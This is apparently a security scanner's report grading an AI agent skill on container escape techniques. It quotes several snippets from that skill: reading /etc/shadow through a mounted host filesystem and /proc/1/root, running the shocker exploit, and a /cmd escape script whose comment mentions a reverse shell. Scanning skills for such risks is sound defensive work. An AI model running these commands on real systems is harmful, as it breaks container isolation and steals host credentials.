container-escape-techniques

https://raw.githubusercontent.com/yaklang/hack-skills/main/skills/container-escape-techniques/SKILL.md

github.com/yaklang/hack-skills

Scanned Thu, 28 May 2026 17:29:02 GMT

Scan ID crawl-ck0wknz51n3kpfffpbcf31ci · 2ms

SCORE 55 / 100

Verdict: Proceed with caution

5 high-severity findings.

This skill reads protected filesystem locations plus 5 other issues listed below.

0 critical5 high1 medium6 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 5 high-severity findings (3+ HIGHs → C).

0 CRIT5 HIGH1 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 3 of 5 HIGH (cap is 2).
A
Reach Atarget score 95
Resolve all 5 HIGH.

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 78CWE-552

▾

77# Access host filesystem

78cat /mnt/host/etc/shadow← sensitive path — credential-exfiltration vector

79chroot /mnt/host bash

80```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 98CWE-552

▾

96# Access host processes via /proc

97ls /proc/1/root/ # Host root filesystem

98cat /proc/1/root/etc/shadow← sensitive path — credential-exfiltration vector

100# Inject into host process

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 156CWE-552

▾

154# Works when DAC_READ_SEARCH capability is granted

155gcc shocker.c -o shocker

156./shocker /etc/shadow # Read host file← sensitive path — credential-exfiltration vector

157```

158

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 192CWE-552

▾

190cat > /cmd << 'EOF'

191#!/bin/sh

192cat /etc/shadow > /output 2>&1 # Or: reverse shell← sensitive path — credential-exfiltration vector

193EOF

194chmod +x /cmd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 235CWE-552

▾

233# Access host processes directly:

234ls /proc/1/root/ # Host's root filesystem

235cat /proc/1/root/etc/shadow← sensitive path — credential-exfiltration vector

236

237# Inject into host process:

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

Scan another →Share

skillox.io/r/crawl-ck0wknz51n3kpfffpbcf31ci